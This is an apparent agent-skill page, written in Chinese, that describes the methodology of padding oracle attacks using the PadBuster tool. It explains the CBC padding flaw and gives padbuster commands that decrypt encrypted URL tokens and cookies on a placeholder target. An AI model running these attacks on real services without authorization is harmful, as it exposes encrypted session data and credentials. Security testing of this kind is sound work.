padbuster-padding-oracle

Installation
SKILL.md

PadBuster Padding Oracle 攻击方法论

PadBuster 是 Padding Oracle 攻击的自动化工具。核心能力:自动解密 CBC 密文 + 伪造任意明文的合法密文 + 支持多种编码

项目地址:https://github.com/AonCyberLabs/PadBuster

漏洞原理

Padding Oracle 漏洞出现在使用 CBC 模式块加密(AES-CBC/DES-CBC)的应用中,当应用对 padding 错误和其他错误返回不同响应时,攻击者可逐字节还原明文或构造任意密文。

Phase 1: 解密模式

# 解密 URL 参数中的密文(Base64 编码,AES-128)
padbuster "http://target/api?token=ENCRYPTED_VALUE" "ENCRYPTED_VALUE" 16 -encoding 0

# 解密 Cookie 中的密文
padbuster "http://target/" "BASE64_CIPHER" 16 \
  -cookies "auth=BASE64_CIPHER" -encoding 0
Installs
31
GitHub Stars
1.7K
First Seen
May 2, 2026
padbuster-padding-oracle — wgpsec/aboutsecurity